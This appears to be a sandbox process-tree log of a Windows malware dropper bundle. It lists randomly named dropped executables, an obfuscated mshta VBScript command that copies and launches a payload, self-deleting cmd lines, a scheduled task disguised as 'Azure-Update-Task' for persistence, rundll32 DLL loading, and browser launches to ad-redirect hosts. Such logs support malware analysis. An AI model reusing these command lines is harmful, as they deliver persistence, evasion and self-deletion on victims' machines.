C:\Users\Admin\Documents\FyUmrSCgfHSfeelRiVy60r2e.exe"C:\Users\Admin\Documents\FyUmrSCgfHSfeelRiVy60r2e.exe"6⤵PID:3048
-
-
C:\Users\Admin\Documents\D5_UQ3h2Ywr6MHpdIqV7XqKC.exe"C:\Users\Admin\Documents\D5_UQ3h2Ywr6MHpdIqV7XqKC.exe"6⤵PID:1644
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:CLOse( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\D5_UQ3h2Ywr6MHpdIqV7XqKC.exe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF """"== """" for %w In ( ""C:\Users\Admin\Documents\D5_UQ3h2Ywr6MHpdIqV7XqKC.exe"" ) do taskkill /F -iM ""%~nxw"" " , 0, tRUE ) )7⤵PID:688
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\D5_UQ3h2Ywr6MHpdIqV7XqKC.exe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj&IF ""== "" for %w In ("C:\Users\Admin\Documents\D5_UQ3h2Ywr6MHpdIqV7XqKC.exe" ) do taskkill /F -iM "%~nxw"8⤵PID:820
-
-
-
-
C:\Users\Admin\Documents\5iZrNGDwasQltK2PBNUTO_Vk.exe"C:\Users\Admin\Documents\5iZrNGDwasQltK2PBNUTO_Vk.exe"6⤵PID:2592
-
-
C:\Users\Admin\Documents\vom7gjxuvymENG2J5BaP_wUz.exe"C:\Users\Admin\Documents\vom7gjxuvymENG2J5BaP_wUz.exe"6⤵PID:2792
-
-
C:\Users\Admin\Documents\u6zPGyMieZR6p31sOBid4cGH.exe"C:\Users\Admin\Documents\u6zPGyMieZR6p31sOBid4cGH.exe"6⤵PID:2972
-
-
C:\Users\Admin\Documents\6vYjcQ4jZOrW3rORAT1r1gUu.exe"C:\Users\Admin\Documents\6vYjcQ4jZOrW3rORAT1r1gUu.exe"6⤵PID:3000
-
C:\Users\Admin\Documents\6vYjcQ4jZOrW3rORAT1r1gUu.exeC:\Users\Admin\Documents\6vYjcQ4jZOrW3rORAT1r1gUu.exe7⤵PID:2336
-
-
-
C:\Users\Admin\Documents\ZtxDLqwKS7EYeAGuO34dZL81.exe"C:\Users\Admin\Documents\ZtxDLqwKS7EYeAGuO34dZL81.exe"6⤵PID:1664
-
-
C:\Users\Admin\Documents\x17hqaFyvZTLDS0QqKoZ4bT4.exe"C:\Users\Admin\Documents\x17hqaFyvZTLDS0QqKoZ4bT4.exe"6⤵PID:1036
-
-
C:\Users\Admin\Documents\lqe4YPWkpGfQCfpZUQkWQoNa.exe"C:\Users\Admin\Documents\lqe4YPWkpGfQCfpZUQkWQoNa.exe"6⤵PID:2864
-
-
C:\Users\Admin\Documents\_uX_5XjkaBGZArop1NtIP_ir.exe"C:\Users\Admin\Documents\_uX_5XjkaBGZArop1NtIP_ir.exe"6⤵PID:2364
-
-
C:\Users\Admin\Documents\eIlUoI_DJxLcFYlAPPVdSH8p.exe"C:\Users\Admin\Documents\eIlUoI_DJxLcFYlAPPVdSH8p.exe"6⤵PID:2732
-
-
C:\Users\Admin\Documents\WixF9p_Ww_1oLEtwjtDEX4I5.exe"C:\Users\Admin\Documents\WixF9p_Ww_1oLEtwjtDEX4I5.exe"6⤵PID:1324
-
-
C:\Users\Admin\Documents\MDkXR1fXP2QTg_zz6hDiQ1Ta.exe"C:\Users\Admin\Documents\MDkXR1fXP2QTg_zz6hDiQ1Ta.exe"6⤵PID:2544
-
-
C:\Users\Admin\Documents\Rl4994zMDCcJiqxQ0J4oxDSu.exe"C:\Users\Admin\Documents\Rl4994zMDCcJiqxQ0J4oxDSu.exe"6⤵PID:2340
-
-
C:\Users\Admin\Documents\BZJUbWAx1ti8Wfu5fCYRqpdR.exe"C:\Users\Admin\Documents\BZJUbWAx1ti8Wfu5fCYRqpdR.exe"6⤵PID:2216
-
-
C:\Users\Admin\Documents\jOye4IfVCtLlmT0FMPVeBNuJ.exe"C:\Users\Admin\Documents\jOye4IfVCtLlmT0FMPVeBNuJ.exe"6⤵PID:2672
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\jOye4IfVCtLlmT0FMPVeBNuJ.exe"7⤵PID:3528
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:4092
-
-
-
-
C:\Users\Admin\Documents\TbrUSaPvwd5mDH5LKvXKoVp4.exe"C:\Users\Admin\Documents\TbrUSaPvwd5mDH5LKvXKoVp4.exe"6⤵PID:976
-
-
C:\Users\Admin\Documents\6wSGu9LRk8w_wjMfh4C3KyOy.exe"C:\Users\Admin\Documents\6wSGu9LRk8w_wjMfh4C3KyOy.exe"6⤵PID:2604
-
-
C:\Users\Admin\Documents\WOILfZ8ZAz0m7e7A_sFxwTiq.exe"C:\Users\Admin\Documents\WOILfZ8ZAz0m7e7A_sFxwTiq.exe"6⤵PID:2056
-
C:\Users\Admin\Documents\WOILfZ8ZAz0m7e7A_sFxwTiq.exe"C:\Users\Admin\Documents\WOILfZ8ZAz0m7e7A_sFxwTiq.exe"7⤵PID:3156
-
-
-
C:\Users\Admin\Documents\0WI1v0gzcTBFaa0kYLJ0thrG.exe"C:\Users\Admin\Documents\0WI1v0gzcTBFaa0kYLJ0thrG.exe"6⤵PID:1716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 9567⤵
- Program crash
PID:3488
-
-
-
C:\Users\Admin\Documents\dZQlFfryImTivSURSudf2hWi.exe"C:\Users\Admin\Documents\dZQlFfryImTivSURSudf2hWi.exe"6⤵PID:2612
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2090b5515d63b2.exe4⤵
- Loads dropped DLL
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu2090b5515d63b2.exeThu2090b5515d63b2.exe5⤵
- Executes dropped EXE
PID:520 -
C:\Users\Admin\AppData\Local\Temp\tmp5273_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp5273_tmp.exe"6⤵PID:4028
-
C:\Users\Admin\AppData\Local\Temp\tmp5273_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp5273_tmp.exe7⤵PID:1896
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20bc9ea26f.exe4⤵PID:1724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20fdd9ac35a68.exe4⤵PID:1328
-
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu20fdd9ac35a68.exeThu20fdd9ac35a68.exe5⤵PID:3856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu203cdb52ef3c6580d.exe4⤵PID:1988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2025d6674aed72ba.exe /mixone4⤵
- Loads dropped DLL
PID:1100
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-ARAAN.tmp\Thu2026c04e7218e1.tmp"C:\Users\Admin\AppData\Local\Temp\is-ARAAN.tmp\Thu2026c04e7218e1.tmp" /SL5="$4012E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu2026c04e7218e1.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:936 -
C:\Users\Admin\AppData\Local\Temp\is-HTN53.tmp\___YHDG34.exe"C:\Users\Admin\AppData\Local\Temp\is-HTN53.tmp\___YHDG34.exe" /S /UID=burnerch22⤵PID:2476
-
C:\Program Files\Uninstall Information\MLHJILSDLR\ultramediaburner.exe"C:\Program Files\Uninstall Information\MLHJILSDLR\ultramediaburner.exe" /VERYSILENT3⤵PID:3352
-
C:\Users\Admin\AppData\Local\Temp\is-BNPC6.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-BNPC6.tmp\ultramediaburner.tmp" /SL5="$20290,281924,62464,C:\Program Files\Uninstall Information\MLHJILSDLR\ultramediaburner.exe" /VERYSILENT4⤵PID:3476
-
-
-
C:\Users\Admin\AppData\Local\Temp\30-db57b-adf-f0b97-55ecd4993dee6\Xaenaezhaepylae.exe"C:\Users\Admin\AppData\Local\Temp\30-db57b-adf-f0b97-55ecd4993dee6\Xaenaezhaepylae.exe"3⤵PID:3616
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵PID:1536
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1536 CREDAT:275457 /prefetch:25⤵PID:2988
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵PID:3800
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3800 CREDAT:275457 /prefetch:25⤵PID:3808
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514834⤵PID:3092
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3092 CREDAT:275458 /prefetch:25⤵PID:4052
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515134⤵PID:828
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:828 CREDAT:275457 /prefetch:25⤵PID:1932
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872154⤵PID:2524
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2524 CREDAT:275457 /prefetch:25⤵PID:3552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9c-22e1e-126-f7895-c54b38a5c25e6\Jadolaezhilu.exe"C:\Users\Admin\AppData\Local\Temp\9c-22e1e-126-f7895-c54b38a5c25e6\Jadolaezhilu.exe"3⤵PID:3852
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3kblhruq.p0j\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:3056
-
C:\Users\Admin\AppData\Local\Temp\3kblhruq.p0j\installer.exeC:\Users\Admin\AppData\Local\Temp\3kblhruq.p0j\installer.exe /qn CAMPAIGN="654"5⤵PID:3268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\grrumefo.r3t\anyname.exe & exit4⤵PID:2932
-
C:\Users\Admin\AppData\Local\Temp\grrumefo.r3t\anyname.exeC:\Users\Admin\AppData\Local\Temp\grrumefo.r3t\anyname.exe5⤵PID:2408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\acmnbv5v.40o\gcleaner.exe /mixfive & exit4⤵PID:2372
-
C:\Users\Admin\AppData\Local\Temp\acmnbv5v.40o\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\acmnbv5v.40o\gcleaner.exe /mixfive5⤵PID:4080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\acmnbv5v.40o\gcleaner.exe" & exit6⤵PID:3280
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f7⤵
- Kills process with taskkill
PID:668
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ntallfc3.o0t\autosubplayer.exe /S & exit4⤵PID:3740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu2025d6674aed72ba.exeThu2025d6674aed72ba.exe /mixone1⤵
- Executes dropped EXE
PID:1692
-
C:\Users\Admin\AppData\Local\Temp\6602.exeC:\Users\Admin\AppData\Local\Temp\6602.exe1⤵PID:4072
-
C:\Users\Admin\AppData\Local\Temp\8546.exeC:\Users\Admin\AppData\Local\Temp\8546.exe1⤵PID:3604
-
C:\Users\Admin\AppData\Local\Temp\E06.exeC:\Users\Admin\AppData\Local\Temp\E06.exe1⤵PID:3664
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\E06.exe"2⤵PID:1720
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:2060
-
-
-
C:\Users\Admin\AppData\Local\Temp\Y5w0MsyV22.exe"C:\Users\Admin\AppData\Local\Temp\Y5w0MsyV22.exe"2⤵PID:2268
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"3⤵
- Creates scheduled task(s)
PID:3540
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:960 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3660
-
-
C:\Users\Admin\AppData\Local\Temp\D4CE.exeC:\Users\Admin\AppData\Local\Temp\D4CE.exe1⤵PID:1804
-
C:\Windows\system32\taskeng.exetaskeng.exe {865C665C-9321-4051-A75A-1E027B1F3116} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:3452
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe2⤵PID:904
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"3⤵
- Creates scheduled task(s)
PID:3560
-
-
-
C:\Users\Admin\AppData\Roaming\hjjgfjvC:\Users\Admin\AppData\Roaming\hjjgfjv2⤵PID:1092
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3768 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2700
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2764 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3504
-